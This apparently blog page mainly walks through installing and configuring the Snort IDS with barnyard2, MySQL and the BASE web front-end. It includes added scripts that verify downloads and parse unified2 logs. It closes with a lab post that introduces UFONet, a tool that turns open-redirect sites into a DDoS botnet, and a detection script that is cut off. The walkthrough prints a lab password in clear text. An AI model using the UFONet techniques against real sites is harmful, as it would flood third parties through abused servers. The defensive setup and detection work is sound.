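# checks before untarring it, then build it in the post's order.
#  1. Is it really gzip data? A snort.org login page saved as .tar.gz is the
#     failure the post warns about, and wget --no-check-certificate means TLS
#     vouched for nothing about who served the file.
#  2. Does its SHA-256 match the value you recorded from a trusted channel?
# Assumes sha256sum (or shasum), gzip, tar and awk are installed.

sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# is_gzip FILE: 0 when FILE is a valid gzip stream (what `file` reports as
# "gzip compressed data"), 1 for anything else such as an HTML page.
is_gzip() {
    gzip -t "$1" >/dev/null 2>&1
}

# verify_tarball FILE EXPECTED_SHA256: 0 only if both checks pass.
verify_tarball() {
    vt_file=$1
    vt_want=$2
    if ! is_gzip "$vt_file"; then
        echo "REJECT: $vt_file is not gzip data (an HTML page saved as .tar.gz?)" >&2
        return 1
    fi
    vt_got=$(sha256_of "$vt_file")
    if [ "$vt_got" != "$vt_want" ]; then
        echo "REJECT: $vt_file sha256 $vt_got != expected $vt_want" >&2
        return 2
    fi
    echo "OK: $vt_file"
}

# build_pkg TARBALL EXPECTED_SHA256 [configure options...]: verify first, then
# the post's tar / cd / configure / make / make install sequence. The source
# directory name is read from the archive itself, so a GitHub archive whose
# top-level directory differs from the file name still builds. Not run offline.
build_pkg() {
    bp_tar=$1
    bp_sha=$2
    shift 2
    verify_tarball "$bp_tar" "$bp_sha" || return 1
    bp_dir=$(tar tzf "$bp_tar" | head -1 | cut -d/ -f1)
    tar xzf "$bp_tar" &&
        ( cd "$bp_dir" && ./configure "$@" && make && make install )
}

# make_fixtures DIR: constructed sample input so the checks run offline: a
# real gzip tarball holding one rule, and an HTML page misnamed as a tarball.
make_fixtures() {
    mf_dir=$1
    mkdir -p "$mf_dir/rules"
    echo 'alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001; rev:1;)' \
        > "$mf_dir/rules/local.rules"
    tar czf "$mf_dir/good.tar.gz" -C "$mf_dir" rules
    printf '<html><body>Please log in to download the rules</body></html>\n' \
        > "$mf_dir/bad.tar.gz"
}

# Demo when run directly: the real archive passes; the HTML file is rejected
# even though its own hash is supplied, because the gzip check comes first.
demo_dir=$(mktemp -d)
make_fixtures "$demo_dir"
verify_tarball "$demo_dir/good.tar.gz" "$(sha256_of "$demo_dir/good.tar.gz")" || echo "(unexpected)"
verify_tarball "$demo_dir/bad.tar.gz"  "$(sha256_of "$demo_dir/bad.tar.gz")"  || echo "(rejected as expected)"
# Real use, with the hash you recorded for the release (placeholder here):
# build_pkg /snort/snort-2.9.8.3.tar.gz <sha256-from-trusted-channel> --enable-sourcefire
rm -rf "$demo_dir"
```

Two things the sequence in the post leaves implicit: build_pkg takes the directory name from the archive listing, which matters for the GitHub libdnet archive, whose top-level directory is not simply libdnet-1.12; and once libpcap, libdnet and daq have been installed under /usr/local/lib, make sure that directory is listed under /etc/ld.so.conf.d/ and run ldconfig before starting snort, otherwise CentOS 6 fails to load the freshly built shared libraries at start.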





(5) Test Snort


① Switch the interface mode and check the snort version


        (wireless)

        - Managed mode     ) # airmon-ng stop wlan0

        - Monitor mode     ) # airmon-ng start wlan0

        (wired)

        - Non-promiscuous mode ) # ifconfig eth0 -promisc

        - Promiscuous mode     ) # ifconfig eth0 promisc


# ifconfig eth0 promisc

# ifconfig eth0

eth0      Link encap:Ethernet  HWaddr 00:0C:29:8D:B0:53 

          inet addr:192.168.10.203  Bcast:192.168.10.255  Mask:255.255.255.0

          inet6 addr: fe80::20c:29ff:fe8d:b053/64 Scope:Link

          UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1

          RX packets:433 errors:0 dropped:0 overruns:0 frame:0

          TX packets:177 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:1000

          RX bytes:57168 (55.8 KiB)  TX bytes:12204 (11.9 KiB)


# which snort

/usr/local/bin/snort


# snort -V

   ,,_     -*> Snort! <*-

  o"  )~   Version 2.9.7.5 GRE (Build 262)

   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/contact#team

           Copyright (C) 2014-2015 Cisco and/or its affiliates. All rights reserved.

           Copyright (C) 1998-2013 Sourcefire, Inc., et al.

           Using libpcap version 1.7.4

           Using PCRE version: 8.37 2015-04-28

           Using ZLIB version: 1.2.3

or

 

   ,,_     -*> Snort! <*-

  o"  )~  Version 2.9.8.2 GRE (Build 335)

   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/contact#team

           Copyright (C) 2014-2015 Cisco and/or its affiliates. All rights reserved.

           Copyright (C) 1998-2013 Sourcefire, Inc., et al.

           Using libpcap version 1.7.4

           Using PCRE version: 8.38 2015-11-23

           Using ZLIB version: 1.2.3






2. References


■ Reference video

http://www.youtube.com/watch?v=DYBfCyd6cC0



snort rules generate => tools

snort(IDS) + preventing => IPS

snort -> DB -> WEB => tools





2.  snort rules & configuration


① Create the directories and files

# mkdir -p /etc/snort/rules

# mkdir /var/log/snort /var/log/barnyard2 /usr/local/lib/snort_dynamicrules


# useradd snort    /* the user may already exist; it was added when ids.example.com was installed */

# chown -R snort:snort /etc/snort /var/log/snort /var/log/barnyard2



② setup snort rules

# cd /snort/snortrules

# tar xvzf snortrules-snapshot-*.tar.gz -C /etc/snort   /* -C : change directory */

-> output omitted


# cp -r /etc/snort/etc/* /etc/snort


# touch /etc/snort/rules/white_list.rules

# touch /etc/snort/rules/black_list.rules


# chown -R snort:snort /etc/snort

#


③ snort main file - snort.conf

# vi /etc/snort/snort.conf

[before]

 45 ipvar HOME_NET any

104 var RULE_PATH ../rules

105 var SO_RULE_PATH ../so_rules

106 var PREPROC_RULE_PATH ../preproc_rules

109 var WHITE_LIST_PATH ../rules

110 var BLACK_LIST_PATH ../rules

519 # output alert_unified2: filename snort.alert, limit 128, nostamp

520 # output log_unified2: filename snort.log, limit 128, nostamp

[after]

 45 ipvar HOME_NET 192.168.20.0/24

104 var RULE_PATH /etc/snort/rules

105 var SO_RULE_PATH /etc/snort/so_rules

106 var PREPROC_RULE_PATH /etc/snort/preproc_rules

109 var WHITE_LIST_PATH /etc/snort/rules

110 var BLACK_LIST_PATH /etc/snort/rules

519 output alert_unified2: filename snort.alert, limit 128, nostamp

520 output log_unified2: filename snort.log, limit 128, nostamp

-> Edit the lines shown above.


④ snort init script(EX: startup script)

# cp /snort/snort-*/rpm/snortd /etc/init.d/snortd

# chmod 755 /etc/init.d/snortd

# cat /etc/init.d/snortd | more

.....

# Source the local configuration file

. /etc/sysconfig/snort

.....

if [ "$CONF"X = "X" ]; then

   CONF="-c /etc/snort/snort.conf"

else

   CONF="-c $CONF"

fi

.....

if [ "$LOGDIR"X = "X" ]; then

   LOGDIR=/var/log/snort

fi

.....

                daemon /usr/sbin/snort $ALERTMODE $BINARY_LOG $NO_PACKET_LOG $DUMP_APP -D $PRINT_INTERFACE -i $i -u $USER -g $GROUP $CONF -l $LOGDIR/$i $PASS_FIRST $BPFFILE $BPF

           done

.....


# cp /snort/snort-*/rpm/snort.sysconfig /etc/sysconfig/snort

# cat /etc/sysconfig/snort

-> Just check the contents.

# ln -s /usr/local/bin/snort /usr/sbin/snort

#


# chown -R snort:snort /var/log/snort

# chown snort:snort /usr/local/bin/snort

-> (Note) Handing the binary to the unprivileged snort user is not required: snort starts as root to open the interface and drops to snort:snort by itself via -u/-g. Keeping the binary root-owned (root:root, mode 755) is the safer choice, because a compromised snort account could otherwise replace the code that root executes at the next start.


        [Note] Procedure for registering a new service

        # vi /etc/init.d/snortd

        # chmod 700 /etc/init.d/snortd

        # chown snort:snort /etc/init.d/snortd

        # chkconfig --add snortd


# chkconfig --add snortd

# chkconfig --list snortd

snortd           0:off   1:off   2:on    3:on    4:on    5:on    6:off


# service snortd start

Starting snort: Spawning daemon child...

My daemon child 25853 lives...

Daemon parent exiting (0)

                                                           [  OK  ]


# pgrep -lf snort

25853 /usr/sbin/snort -A fast -b -d -D -i eth0 -u snort -g snort -c /etc/snort/snort.conf -l /var/log/snort


       -A alert-mode

              Alert using the specified alert-mode. Valid alert modes include

              fast, full, none, and unsock.  Fast writes alerts to the default

              "alert" file in a single-line, syslog style alert message.  Full

              writes the alert to the  "alert"  file  with  the  full  decoded

              header  as  well as the alert message.  None turns off alerting.

              Unsock is an experimental mode that sends the alert  information

              out  over a UNIX socket to another process that attaches to that

              socket.


       -b     Log packets in a tcpdump(1) formatted file.    All  packets  are

              logged  in  their native binary state to a tcpdump formatted log

              file named with the snort start timestamp and "snort.log".  This

              option results in much faster operation of the program

               since  it doesn’t have to spend time in the packet binary->text

              converters.  Snort can keep up pretty well with 100Mbps networks

              in  ’-b’  mode.   To choose an alternate name for the binary log

              file, use the ’-L’ switch.


       -d     Dump the application layer data when displaying packets in  ver-

              bose or packet logging mode.


       -D    Run    Snort    in    daemon   mode.    Alerts   are   sent   to

              /var/log/snort/alert unless otherwise specified.


       -i interface

              Sniff packets on interface.


       -u user

              Change  the  user/UID Snort runs under to user after initialization.


       -g group

              Change the group/GID Snort runs under to group after initializa-

              tion.  This switch allows Snort to drop  root  privileges  after

              it’s initialization phase has completed as a security measure.


      -c config-file

              Use the rules located in file config-file.


       -l log-dir

              Set the output logging directory to  log-dir.   All  plain  text

              alerts  and  packet logs go into this directory.  If this option

              is not specified,  the  default  logging  directory  is  set  to

              /var/log/snort.

# service snortd stop

Stopping snort:                                            [  OK  ]


# service snortd status

snort is stopped


# cd /var/log/snort

# ls -l

-rw-r--r--. 1 root  root 0 2016-06-03 12:52 alert

-rw-------. 1 snort snort 0 2016-06-03 12:54 snort_eth0.pid.lck


# chown -R snort:snort /var/log/snort

#

■ sniffer mode - for analyzing network traffic in real time

        run-time options:

        -v verbose

        -d dump packet payloads

        -X dump the entire packet in hex, starting at the link layer (in Snort 2.9 the lowercase -x means something else: exit on configuration errors)

        -a display ARP packets

        -e display link layer data



■ Print TCP/IP packet headers

        [TERM2] # ping 168.126.63.1

# snort -v        (# snort -v -c /etc/snort/snort.conf -l /var/log/snort)

Print the headers and the data portion

# snort -dv      (# snort -dv -c /etc/snort/snort.conf -l /var/log/snort)

Also print the data link layer headers

# snort -dev     (# snort -dev -c /etc/snort/snort.conf -l /var/log/snort)



■ log mode - save the output to the log directory


command line options

-l dump packets into the log directory

-b log packets in binary (tcpdump) format


Examples

# snort -dev -b -l /var/log/snort -c /etc/snort/snort.conf

# snort -dev -b -l /var/log/snort -h 192.168.20.0/24 -c /etc/snort/snort.conf



■ NIDS mode


# snort -d -h 192.168.20.0/24 -l /var/log/snort -c /etc/snort/snort.conf -A fast

-A fast : Fast alert mode

-A full

-A unsock

-A none

-A console(screen)

-A cmg(custom mode)


[Examples]

fast mode

# snort -c /etc/snort/snort.conf -l /var/log/snort -A fast


full mode

# snort -c /etc/snort/snort.conf -l /var/log/snort -A full -D


checking log files

# ls -l /var/log/snort

# cat alert

# cat snort.log.1389675205

# tcpdump -nr /var/log/snort/snort.log.13897656




■ barnyard configuration

■ MySQL configuration

■ barnyard & snort startup

■ BASE installation

■ BASE configuration



[ snort ---> (unified2 spool) ---> barnyard2 ---> MySQL <--- BASE (web front-end) ]



■ barnyard2 - github.com/firnsy/barnyard2

A dedicated spooler for Snort's unified2 binary output format.

It is an output system for Snort: it reads the binary logs that Snort writes in unified2 format

and resends the information in those logs to a database backend.


■ BASE: Basic Analysis and Security Engine

provides a web front-end to query and analyze the alerts coming from Snort.

The alerts are sent to the MySQL database by barnyard2; BASE only reads (and archives) what is already in the database.

http://base.professionallyevil.com/
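To see what barnyard2 actually does when it opens a spool file and then reports "Waiting for new data", here is an added example (not from the page and not barnyard2's own code) that parses unified2 records in pure Python: the 8-byte record header, the 52-byte legacy IDS event record (type 7, what Snort 2.9 writes by default for IPv4) and the packet record (type 2). The spool bytes are constructed inline with struct.pack rather than read from /var/log/snort; the sensor/event IDs, addresses and timestamps are assumed values. A trailing partial record (Snort still writing it) is left unread, and the returned byte offset plays the role of the bookmark that the bylog.waldo file keeps between runs.

```python
"""Minimal reader for Snort's unified2 spool format (the format barnyard2 consumes)."""
import ipaddress
import struct

# Record types Snort 2.9 writes with 'output log_unified2' / 'output alert_unified2'
UNIFIED2_PACKET = 2
UNIFIED2_IDS_EVENT = 7          # legacy IPv4 event record, 52 bytes

RECORD_HDR = struct.Struct(">II")       # type, length (big-endian)
IDS_EVENT = struct.Struct(">11I2H4B")   # Serial_Unified2IDSEvent_legacy
PACKET_HDR = struct.Struct(">7I")       # Serial_Unified2Packet without the payload

EVENT_FIELDS = ("sensor_id", "event_id", "event_second", "event_microsecond",
                "signature_id", "generator_id", "signature_revision",
                "classification_id", "priority_id", "ip_source", "ip_destination",
                "sport_itype", "dport_icode", "protocol", "impact_flag", "impact", "blocked")
PACKET_FIELDS = ("sensor_id", "event_id", "event_second", "packet_second",
                 "packet_microsecond", "linktype", "packet_length")


def read_records(spool, offset=0):
    """Parse complete records from `spool` starting at `offset`.

    Returns (records, new_offset).  An incomplete record at the end is left
    unread, which is what barnyard2 does while it waits for Snort to finish it.
    """
    records = []
    while len(spool) - offset >= RECORD_HDR.size:
        rtype, rlen = RECORD_HDR.unpack_from(spool, offset)
        body_start = offset + RECORD_HDR.size
        if len(spool) - body_start < rlen:
            break                                    # partial record: wait for more data
        body = spool[body_start:body_start + rlen]
        if rtype == UNIFIED2_IDS_EVENT and rlen == IDS_EVENT.size:
            rec = dict(zip(EVENT_FIELDS, IDS_EVENT.unpack(body)))
            rec["type"] = "event"
            rec["src"] = str(ipaddress.IPv4Address(rec.pop("ip_source")))
            rec["dst"] = str(ipaddress.IPv4Address(rec.pop("ip_destination")))
        elif rtype == UNIFIED2_PACKET and rlen >= PACKET_HDR.size:
            rec = dict(zip(PACKET_FIELDS, PACKET_HDR.unpack_from(body)))
            rec["type"] = "packet"
            rec["data"] = body[PACKET_HDR.size:PACKET_HDR.size + rec["packet_length"]]
        else:                                        # IPv6/VLAN/extra-data types etc.
            rec = {"type": "unknown", "record_type": rtype, "raw": body}
        records.append(rec)
        offset = body_start + rlen
    return records, offset


def correlate(records):
    """Group packet records with their event by (sensor_id, event_id), as barnyard2 does."""
    groups = {}
    for r in records:
        key = (r.get("sensor_id"), r.get("event_id"))
        g = groups.setdefault(key, {"event": None, "packets": []})
        if r["type"] == "event":
            g["event"] = r
        elif r["type"] == "packet":
            g["packets"].append(r)
    return groups


def build_sample_spool():
    """Constructed sample spool: one event, its packet, then a truncated event record."""
    event = IDS_EVENT.pack(
        1, 1, 1464870215, 123456,                      # sensor_id, event_id, sec, usec (assumed)
        1000002, 1, 2,                                 # sid, gid, rev (hypothetical local rule)
        3, 2,                                          # classification_id, priority_id
        int(ipaddress.IPv4Address("192.168.20.55")),
        int(ipaddress.IPv4Address("192.168.20.203")),
        51234, 22,                                     # sport, dport
        6, 0, 0, 0)                                    # proto=TCP, impact_flag, impact, blocked
    payload = bytes(range(60))                         # dummy frame bytes, not a real packet
    packet = PACKET_HDR.pack(1, 1, 1464870215, 1464870215, 123456, 1, len(payload)) + payload
    partial = RECORD_HDR.pack(UNIFIED2_IDS_EVENT, IDS_EVENT.size) + event[:20]
    return (RECORD_HDR.pack(UNIFIED2_IDS_EVENT, len(event)) + event
            + RECORD_HDR.pack(UNIFIED2_PACKET, len(packet)) + packet
            + partial), event


if __name__ == "__main__":
    spool, _ = build_sample_spool()
    recs, pos = read_records(spool)
    for key, g in correlate(recs).items():
        print(key, g["event"]["src"], "->", g["event"]["dst"], "packets:", len(g["packets"]))
    print("resume offset:", pos, "of", len(spool))
```

Reading `/var/log/snort/snort.log.<timestamp>` with `read_records(open(path, "rb").read())` gives the same records barnyard2 inserts into the `event`, `iphdr` and `data` tables; resuming from the returned offset after the file has grown picks up exactly the records that were incomplete before.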






① Barnyard installation


# vi /etc/hosts

..... (omitted) .....

192.168.20.203   ids.example.com  ids

192.168.10.203   nic2


# mkdir -p /snort

# cd /snort

# wget --no-check-certificate \

https://github.com/firnsy/barnyard2/archive/master.zip \

-O master.zip

-> output omitted


# unzip master.zip

-> output omitted


# cd barnyard2-master

# ls

autogen.sh    COPYING  etc      m4           README         rpm      src

configure.ac  doc      LICENSE  Makefile.am  RELEASE.NOTES  schemas  tools


        (automatic) # ./autogen.sh       /* update configuration files */

        (manual)    # autoconf -f -v -i -I ./m4


        (Note) Prerequisite packages - if the packages below are missing they must be installed.

        Check this before running the autogen.sh script.

        (RedHat family) # yum -y install autoconf libtool automake

        (Debian family) # apt-get install autoconf libtool automake


# yum -y install autoconf libtool automake

# ./autogen.sh

Found libtoolize

libtoolize: putting auxiliary files in `.'.

libtoolize: copying file `./ltmain.sh'

libtoolize: putting macros in AC_CONFIG_MACRO_DIR, `m4'.

libtoolize: copying file `m4/libtool.m4'

libtoolize: copying file `m4/ltoptions.m4'

libtoolize: copying file `m4/ltsugar.m4'

libtoolize: copying file `m4/ltversion.m4'

libtoolize: copying file `m4/lt~obsolete.m4'

autoreconf: Entering directory `.'

autoreconf: configure.ac: not using Gettext

autoreconf: running: aclocal --force -I m4

autoreconf: configure.ac: tracing

autoreconf: running: libtoolize --copy --force

libtoolize: putting auxiliary files in `.'.

libtoolize: copying file `./ltmain.sh'

libtoolize: putting macros in AC_CONFIG_MACRO_DIR, `m4'.

libtoolize: copying file `m4/libtool.m4'

libtoolize: copying file `m4/ltoptions.m4'

libtoolize: copying file `m4/ltsugar.m4'

libtoolize: copying file `m4/ltversion.m4'

libtoolize: copying file `m4/lt~obsolete.m4'

autoreconf: running: /usr/bin/autoconf --force

autoreconf: running: /usr/bin/autoheader --force

autoreconf: running: automake --add-missing --copy --force-missing

configure.ac:11: installing `./config.guess'

configure.ac:11: installing `./config.sub'

configure.ac:8: installing `./install-sh'

configure.ac:8: installing `./missing'

autoreconf: Leaving directory `.'

You can now run "./configure" and then "make".


# ./configure --help | egrep '(mysql|lib)'

  --with-mysql=DIR               Support for MySQL

  --with-mysql-libraries=DIR     MySQL library directory


# yum -y install mysql mysql-devel

# ln -s /usr/lib64/mysql/libmysqlclient.so.16.0.0 /usr/lib/libmysqlclient.so.16.0.0

# ln -s /usr/lib64/mysql/libmysqlclient_r.so.16.0.0 /usr/lib/libmysqlclient_r.so.16.0.0


# cd /snort/barnyard2-master

# ./configure --with-mysql --with-mysql-libraries=/usr/lib64


# make

# make install


# cp /snort/barnyard2-master/etc/barnyard2.conf /etc/snort

# cp /snort/barnyard2-master/schemas/create_mysql /usr/local/src


# mkdir -p /var/log/barnyard2     /* the directory was already created earlier */

# chown -R snort:snort /var/log/barnyard2


# cp /snort/snort-*/etc/gen-msg.map /etc/snort


② barnyard configuration

# vi /etc/snort/barnyard2.conf

[before]

227: output alert_fast: stdout

351: #output database: log, mysql, user=root password=test dbname=db host=localhost

[after]

227: output alert_fast

351: output database: log, mysql, user=snort password=snort dbname=snort host=localhost

-> Remove the comment marker and edit the line.

-> (Note) barnyard2.conf now holds the DB password in clear text; keep it readable only by the account that runs barnyard2, e.g. # chmod 640 /etc/snort/barnyard2.conf


③ Setup the MySQL Server

(Note) Do this work locally on the sensor itself.

# yum -y install mysql-server

-> output omitted


# chkconfig mysqld on

# service mysqld start

Initializing MySQL database:  Installing MySQL system tables...

OK

Filling help tables...

OK

 

To start mysqld at boot time you have to copy

support-files/mysql.server to the right place for your system

 

PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER !

To do so, start the server, then issue the following commands:

 

/usr/bin/mysqladmin -u root password 'new-password'

/usr/bin/mysqladmin -u root -h ids.example.com password 'new-password'

 

Alternatively you can run:

/usr/bin/mysql_secure_installation

 

which will also give you the option of removing the test

databases and anonymous user created by default.  This is

strongly recommended for production servers.

 

See the manual for more instructions.

 

You can start the MySQL daemon with:

cd /usr ; /usr/bin/mysqld_safe &

 

You can test the MySQL daemon with mysql-test-run.pl

cd /usr/mysql-test ; perl mysql-test-run.pl

 

Please report any problems with the /usr/bin/mysqlbug script!

 

                                                           [  OK  ]

Starting mysqld:                                           [  OK  ]


# mysql_secure_installation

NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MySQL

      SERVERS IN PRODUCTION USE!  PLEASE READ EACH STEP CAREFULLY!

 

 

In order to log into MySQL to secure it, we'll need the current

password for the root user.  If you've just installed MySQL, and

you haven't set the root password yet, the password will be blank,

so you should just press enter here.

 

Enter current password for root (enter for none): <ENTER>

OK, successfully used password, moving on...

 

Setting the root password ensures that nobody can log into the MySQL

root user without the proper authorisation.

 

Set root password? [Y/n] Y

New password: (soldesk1.)

Re-enter new password: (soldesk1.)

Password updated successfully!

Reloading privilege tables..

 ... Success!

 

 

By default, a MySQL installation has an anonymous user, allowing anyone

to log into MySQL without having to have a user account created for

them.  This is intended only for testing, and to make the installation

go a bit smoother.  You should remove them before moving into a

production environment.

 

Remove anonymous users? [Y/n] Y

 ... Success!

 

Normally, root should only be allowed to connect from 'localhost'.  This

ensures that someone cannot guess at the root password from the network.

 

Disallow root login remotely? [Y/n] Y

 ... Success!

 

By default, MySQL comes with a database named 'test' that anyone can

access.  This is also intended only for testing, and should be removed

before moving into a production environment.

 

Remove test database and access to it? [Y/n] Y

 - Dropping test database...

 ... Success!

 - Removing privileges on test database...

 ... Success!

 

Reloading the privilege tables will ensure that all changes made so far

will take effect immediately.

 

Reload privilege tables now? [Y/n] Y

 ... Success!

 

Cleaning up...

 

 

 

All done!  If you've completed all of the above steps, your MySQL

installation should now be secure.

 

Thanks for using MySQL!


# mysql -u root -p

Enter password: (soldesk1.)

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 21

Server version: 5.1.73 Source distribution

 

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

 

Oracle is a registered trademark of Oracle Corporation and/or its

affiliates. Other names may be trademarks of their respective

owners.

 

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> create database snort;

Query OK, 1 row affected (0.00 sec)

 

mysql> grant all on snort.* to snort@localhost;

Query OK, 0 rows affected (0.00 sec)

      /* mysql> grant CREATE,INSERT,SELECT,DELETE,UPDATE on snort.* to snort@localhost; */

mysql> set password for snort@localhost=password('snort');

Query OK, 0 rows affected (0.00 sec)

 

mysql> show databases;

+--------------------+

| Database           |

+--------------------+

| information_schema |

| mysql              |

| snort              |

+--------------------+

3 rows in set (0.00 sec)

 

mysql> use snort;

Database changed

mysql> source /usr/local/src/create_mysql     <- from barnyard2

..... (omitted) .....

Query OK, 1 row affected (0.00 sec)

 

Query OK, 1 row affected (0.00 sec)

 

Query OK, 1 row affected (0.00 sec)

 

Query OK, 0 rows affected (0.01 sec)

 

Query OK, 1 row affected (0.00 sec)

 

Query OK, 1 row affected (0.00 sec)

mysql> show tables;

+------------------+

| Tables_in_snort  |

+------------------+

| data             |

| detail           |

| encoding         |

| event            |

| icmphdr          |

| iphdr            |

| opt              |

| reference        |

| reference_system |

| schema           |

| sensor           |

| sig_class        |

| sig_reference    |

| signature        |

| tcphdr           |

| udphdr           |

+------------------+

16 rows in set (0.00 sec)

 

mysql> flush privileges;

Query OK, 0 rows affected (0.00 sec)

 

mysql> exit


④ Start snort using the command


        (automatic) # service snortd restart

        (manual)    # snort -d -A full -u snort -g snort -c /etc/snort/snort.conf -i eth0 &


# service snortd restart

Stopping snort:                                            [FAILED]

Starting snort: Spawning daemon child...

My daemon child 22470 lives...

Daemon parent exiting (0)

                                                           [  OK  ]


# ls -l /var/log/snort

-> (Note) If any file here is not owned by snort:snort, fix it with chown.

        # chown -R snort:snort /var/log/snort


[TERM2] Run this in another terminal

# barnyard2 -c /etc/snort/barnyard2.conf \

-d /var/log/snort -f snort.log \

-w /etc/snort/bylog.waldo \

-C /etc/snort/classification.config

Running in Continuous mode

 

        --== Initializing Barnyard2 ==--

Initializing Input Plugins!

Initializing Output Plugins!

Parsing config file "/etc/snort/barnyard2.conf"

 

 

+[ Signature Suppress list ]+

----------------------------

+[No entry in Signature Suppress List]+

----------------------------

+[ Signature Suppress list ]+

 

Barnyard2 spooler: Event cache size set to [2048]

Log directory = /var/log/barnyard2

INFO database: Defaulting Reconnect/Transaction Error limit to 10

INFO database: Defaulting Reconnect sleep time to 5 second

[ClassificationPullDataStore()]: No Classification found in database ...

[SignaturePullDataStore()]: No signature found in database ...

[SystemPullDataStore()]: No System found in database ...

[ReferencePullDataStore()]: No Reference found in database ...

[SignatureReferencePullDataStore()]: No Reference found in database ...

database: compiled support for (mysql)

database: configured to use mysql

database: schema version = 107

database:           host = localhost

database:           user = snort

database:  database name = snort

database:    sensor name = ids.example.com:NULL

database:      sensor id = 1

database:     sensor cid = 1

database:  data encoding = hex

database:   detail level = full

database:     ignore_bpf = no

database: using the "log" facility

 

        --== Initialization Complete ==--

 

  ______   -*> Barnyard2 <*-

 / ,,_  \  Version 2.1.14 (Build 337)

 |o"  )~|  By Ian Firns (SecurixLive): http://www.securixlive.com/

 + '''' +  (C) Copyright 2008-2013 Ian Firns <firnsy@securixlive.com>

 

WARNING: Unable to open waldo file '/etc/snort/bylog.waldo' (No such file or directory)

Opened spool file '/var/log/snort/snort.log.1464866678'

Closing spool file '/var/log/snort/snort.log.1464866678'. Read 0 records

Opened spool file '/var/log/snort/snort.log.1464866810'

Closing spool file '/var/log/snort/snort.log.1464866810'. Read 0 records

Opened spool file '/var/log/snort/snort.log.1464870215'

Waiting for new data

 

-> It takes a little while to get going, so wait.

-> About 5 to 10 minutes.


⑤ check mysql

# mysql -u root -p

Enter password: (soldesk1.)

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 12

Server version: 5.1.73 Source distribution

 

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

 

Oracle is a registered trademark of Oracle Corporation and/or its

affiliates. Other names may be trademarks of their respective

owners.

 

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

 

mysql> use snort;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

 

Database changed

mysql> select count(*) from event;

+----------+

| count(*) |

+----------+

|        0 |          <---- the event count grows as barnyard2 reads the

+----------+                /var/log/snort/<snort log> files and inserts the events.

1 row in set (0.00 sec)

 

mysql> exit



[Reference]

https://www.youtube.com/watch?v=II80tzwEuFk






BASE Installation

① Prerequisite program installation

# yum install libxml2 \

php \

php-gd \

php-cli \

php-mysql \

php-pear \

php-pear-Log \

php-dba \

php-dbase \

php-odbc \

php-pear-Image-Graph


② PHP edit - BASE log level

# vi /etc/php.ini

[before]

513: error_reporting = E_ALL & ~E_DEPRECATED

[after]

513: error_reporting = E_ALL & ~E_NOTICE

-> edit the line


# service httpd restart

Stopping httpd:                                            [FAILED]

Starting httpd:                                            [  OK  ]


# tail -f /var/log/httpd/error_log

-> Check the error messages and adjust the configuration as needed.

-> <CTRL + C> to stop.


③ BASE and Adodb download

# cd /snort

# wget --no-check-certificate \

http://sourceforge.net/projects/secureideas/files/BASE/base-1.4.5/base-1.4.5.tar.gz

-> output omitted


# tar xvzf base-1.4.5.tar.gz

-> output omitted


# cp -r base-1.4.5 /var/www/html/base

# chown -R apache:apache /var/www/html/base

# chmod 777 /var/www/html/base

-> (Note) 777 is only needed so that the web setup wizard can write base_conf.php into this directory. After Step 5 below, set it back to 755 and make base_conf.php (which contains the DB credentials) readable only by apache, e.g. # chmod 640 /var/www/html/base/base_conf.php


④ Adodb(a database abstraction library for PHP)

download http://sourceforge.net/projects/adodb/

# cd /snort

# wget --no-check-certificate http://sourceforge.net/projects/adodb/files/latest/download

-> output omitted


# tar xvzf adodb-*.tar.gz

-> output omitted


# mkdir /var/www/lib

# cp -r adodb5 /var/www/lib


⑤ BASE configuration


# firefox http://192.168.20.203/base &


Settings

Step 1 of 5

-> continue

 

 

Pick a Language : english

Path to ADODB : /var/www/lib/adodb5

-> continue


Step 2 of 5

Step 3 of 5

Database Name : snort

Database Host : localhost

Database User Name : root

Database Password : soldesk1.

-> (Note) The MySQL root credentials are not needed here: the snort@localhost account created above has all privileges on snort.*, which is enough for BASE to read the events and to create its own tables in Step 4. Using it keeps the root password out of base_conf.php.

-> continue

Admin User Name : soldesk

Password : soldesk1.

Full Name : soldesk

-> continue

 

Step 4 of 5

Step 4 of 5

-> Create BASE AG

-> Now continue to step 5 to login


Step 5 of 5

 

!!! Complete !!!

 

Blank Page















Posted by 22Hz

[Lab] DDoS attack simulation using ufonet


■ Systems used

- KaliLinux


■ Programs used

- ufonet


How UFONet works

UFONet GUI tool



Description

UFONet is a free software tool designed to test DDoS attacks against a target by using 'Open Redirect' vectors on third-party web applications as a botnet.


See these links for more info:


- CWE-601:Open Redirect:

http://cwe.mitre.org/data/definitions/601.html


- OWASP:URL Redirector Abuse:

https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2


UFONet abuses OSI Layer 7-HTTP to create/manage 'zombies' and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.


[Video] -> http://ufonet.03c8.net/ufonet/UFONet-v0.6.ogv
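UFONet's 'zombies' are ordinary web servers whose proxy.php?url= or redirect parameters fetch whatever URL they are handed. The defensive counterpart of the description above is noticing that your own server is being used that way. Below is an added example (not part of the original post and not UFONet's code) that scans Apache combined-format access log lines for redirect-style parameters carrying an external absolute URL and flags external hosts that are hit by repeated requests, i.e. likely reflection targets. The log lines, host names and threshold are constructed/assumed for illustration; the parameter names are a subset of the dork names that ship in UFONet's dorks.txt.

```python
"""Detect open-redirect / proxy endpoints being abused as DDoS reflectors from access logs."""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log line; referer and user-agent are optional so "common" lines parse too
LOG_RE = re.compile(
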